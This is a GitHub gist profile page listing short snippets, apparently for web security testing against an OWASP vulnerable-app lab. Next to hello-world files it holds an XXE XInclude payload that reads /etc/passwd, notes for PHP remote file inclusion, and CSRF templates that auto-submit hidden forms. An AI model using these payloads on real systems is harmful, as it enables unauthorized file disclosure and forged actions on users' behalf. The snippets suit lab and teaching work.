Skip to content

Instantly share code, notes, and snippets.

View jakekarnes42's full-sized avatar

Jake Karnes jakekarnes42

20 followers · 0 following
View GitHub Profile
@jakekarnes42
jakekarnes42 / example.js
Created February 24, 2023 23:07
A benign JavaScript file
console.log("Logged from external JS file");
alert("From external JS file");
@jakekarnes42
jakekarnes42 / powershell_test.ps1
Created January 2, 2020 21:02
Simple Powershell Script for Testing
$env:computername > C:\Users\Az-administrator\Desktop\from_github.txt
@jakekarnes42
jakekarnes42 / host_getter.svg
Created August 13, 2019 23:44
An SVG "image" that uses an XXE attack to embed the hostname file of whichever system processes it into the image itself
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
@jakekarnes42
jakekarnes42 / xinclude_example.xml
Created August 13, 2019 23:37
Simple example of using XInclude in XXE attack
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>
@jakekarnes42
jakekarnes42 / php_rfi_example_notes.txt
Created August 12, 2019 22:34
Example for testing PHP RFI
$ mkdir evil_files
$ cat > evil_files/phpinfo.txt
<?php
phpinfo();
?>
Next, we need to serve the file. Python has a built in web server module we can use for this.
$ cd evil_files
$ python -m SimpleHTTPServer
@jakekarnes42
jakekarnes42 / hello_world.php
Created August 11, 2019 18:42
Simple PHP hello world
<html>
<head>
<title>PHP Test</title>
</head>
<body>
<?php echo '<p>Hello World</p>'; ?>
</body>
</html>
@jakekarnes42
jakekarnes42 / hello_world.html
Last active November 12, 2019 19:43
Hello World HTML
<html>
<head></head>
<body>
<h1>Hello world!</h1>
</body>
<html>
@jakekarnes42
jakekarnes42 / simple_csrf_automatic.html
Created August 11, 2019 18:32
Simple CSRF template that submits a hidden form automatically
<html>
<head>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
<script type="text/javascript">$(document).ready(function (){
setTimeout("$('#target').submit()", 3000);
});</script>
</head>
<body>
<h1>Loading...</h1>
<!–– Change URL and params below-->
@jakekarnes42
jakekarnes42 / csrf_simple_post.html
Created August 11, 2019 18:27
Simple template for POST-based CSRF
<html>
<body>
<!–– Change URL and params below-->
<form method="POST" action="http://owaspbwa/ghost/blogView.php">
<input type="hidden" name="vuln" value="me so dumb"/>
<input type="hidden" name="user" value="admin"/>
<input type="submit" value="Submit">
</form>
</body>
<html>
@jakekarnes42
jakekarnes42 / csrf_json_hidden.html
Created August 7, 2019 23:19
CSRF PoC Example that can be reused. Automatically POSTs a JSON string to a server after a short delay.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
<script type="text/javascript">$(document).ready(function (){
setTimeout("$('#target').submit()", 3000);
});</script>
</head>
<body>